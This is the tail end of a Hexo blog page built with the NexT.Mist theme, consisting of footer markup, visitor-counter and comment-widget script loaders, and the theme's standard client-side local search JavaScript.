  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=5.1.1"></script>



  

  

  

  

  

</body>
</html>
